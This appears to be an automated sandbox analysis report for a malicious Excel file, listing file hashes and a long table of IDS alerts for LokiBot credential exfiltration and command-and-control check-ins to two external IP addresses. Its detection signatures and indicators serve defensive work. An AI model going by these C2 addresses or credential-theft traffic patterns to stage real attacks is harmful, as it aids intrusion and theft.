                    SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                    MD5:7DF1896047D9647D818080DD17563D92
                    SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                    SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                    SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    File type:CDFV2 Encrypted
                    Entropy (8bit):7.958679742635318
                    TrID:
                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                    File name:_2201S_BUSAN_HOCHIMINH_.xlsx
                    File size:191736
                    MD5:cf8b307caa943326ee808bb3cb02deee
                    SHA1:705c25adbdb7b805e47566540b3804eba178e7da
                    SHA256:cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
                    SHA512:cfc3ae790c2e17051a4b03214baefd44eb30e8601bf8afd2d711cd197263854e96c19c2486a8838a1971607e09ad6728f6b9d8d982f6395b1ffc7d9c7eb599aa
                    SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                    Icon Hash:e4e2aa8aa4b4bcb4
                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    02/10/22-10:21:59.753805 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:21:59.753805 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:21:59.753805 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:21:59.753805 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49166 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:02.840347 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:02.840347 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:02.840347 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:02.840347 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49167 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:03.831670 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:03.831670 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:03.831670 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:03.831670 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49168 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:04.920208 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:04.920208 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:04.920208 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:04.920208 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49169 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:05.958935 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:05.958935 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:05.958935 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:05.958935 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49170 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:07.006112 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:07.006112 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:07.006112 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:07.006112 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49171 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:08.131839 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:08.131839 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:08.131839 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:08.131839 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49172 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:09.274963 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:09.274963 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:09.274963 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:09.274963 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49173 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:10.415912 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:10.415912 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:10.415912 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:10.415912 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49174 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:11.483873 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49175 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:11.483873 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49175 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:11.483873 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49175 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:11.483873 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49175 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:12.553926 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49176 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:12.553926 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49176 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:12.553926 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49176 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:12.553926 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49176 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:13.627098 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49177 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:13.627098 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49177 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:13.627098 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49177 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:13.627098 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49177 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:14.784465 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49178 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:14.784465 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49178 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:14.784465 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49178 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:14.784465 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49178 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:15.879811 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49179 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:15.879811 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49179 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:15.879811 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49179 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:15.879811 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49179 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:17.222000 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49180 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:17.222000 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49180 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:17.222000 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49180 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:17.222000 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49180 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:18.584775 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49181 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:18.584775 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49181 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:18.584775 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49181 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:18.584775 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49181 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:20.304833 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49182 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:20.304833 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49182 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:20.304833 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49182 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:20.304833 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49182 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:21.371169 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49183 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:21.371169 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49183 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:21.371169 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49183 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:21.371169 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49183 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:22.490195 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49184 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:22.490195 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49184 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:22.490195 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49184 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:22.490195 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49184 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:23.504559 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49185 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:23.504559 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49185 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:23.504559 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49185 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:23.504559 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49185 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:24.588293 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49186 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:24.588293 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49186 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:24.588293 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49186 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:24.588293 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49186 | 80 | 192.168.2.22 | 104.21.49.244
                    02/10/22-10:22:25.593017 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49187 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:25.593017 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49187 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:25.593017 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49187 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:25.593017 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49187 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:26.671475 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49188 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:26.671475 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49188 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:26.671475 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49188 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:26.671475 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49188 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:27.690157 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49189 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:27.690157 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49189 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:27.690157 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49189 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:27.690157 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49189 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:29.085941 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49190 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:29.085941 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49190 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:29.085941 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49190 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:29.085941 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49190 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:30.799655 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49191 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:30.799655 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49191 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:30.799655 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49191 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:30.799655 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49191 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:31.879954 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49192 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:31.879954 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49192 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:31.879954 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49192 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:31.879954 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49192 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:32.951127 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49193 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:32.951127 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49193 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:32.951127 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49193 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:32.951127 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49193 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:34.006464 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49194 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:34.006464 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49194 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:34.006464 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49194 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:34.006464 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49194 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:35.055713 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49195 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:35.055713 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49195 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:35.055713 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49195 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:35.055713 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49195 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:36.072598 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49196 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:36.072598 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49196 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:36.072598 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49196 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:36.072598 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49196 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:37.120242 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49197 | 80 | 192.168.2.22 | 172.67.197.66
                    02/10/22-10:22:37.120242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22172.67.197.66
                    02/10/22-10:22:37.120242TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22172.67.197.66
                    02/10/22-10:22:37.120242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22172.67.197.66
                    02/10/22-10:22:40.420565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22104.21.49.244
                    02/10/22-10:22:40.420565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22104.21.49.244
                    02/10/22-10:22:40.420565TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22104.21.49.244
                    02/10/22-10:22:40.420565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22104.21.49.244
                    02/10/22-10:22:42.534000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22172.67.197.66
                    02/10/22-10:22:42.534000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22172.67.197.66
                    02/10/22-10:22:42.534000TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22172.67.197.66
                    02/10/22-10:22:42.534000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22172.67.197.66
                    02/10/22-10:22:45.641461TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22104.21.49.244
                    02/10/22-10:22:45.641461TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22104.21.49.244
                    02/10/22-10:22:45.641461TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22104.21.49.244
                    02/10/22-10:22:45.641461TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22104.21.49.244
                    02/10/22-10:22:46.729666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22172.67.197.66
                    02/10/22-10:22:46.729666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22172.67.197.66
                    02/10/22-10:22:46.729666TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22172.67.197.66
                    02/10/22-10:22:46.729666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22172.67.197.66
                    02/10/22-10:22:52.063120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22104.21.49.244
                    02/10/22-10:22:52.063120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22104.21.49.244
                    02/10/22-10:22:52.063120TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22104.21.49.244
                    02/10/22-10:22:52.063120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22104.21.49.244
                    02/10/22-10:22:53.153615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22172.67.197.66
                    02/10/22-10:22:53.153615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22172.67.197.66
                    02/10/22-10:22:53.153615TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22172.67.197.66
                    02/10/22-10:22:53.153615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22172.67.197.66
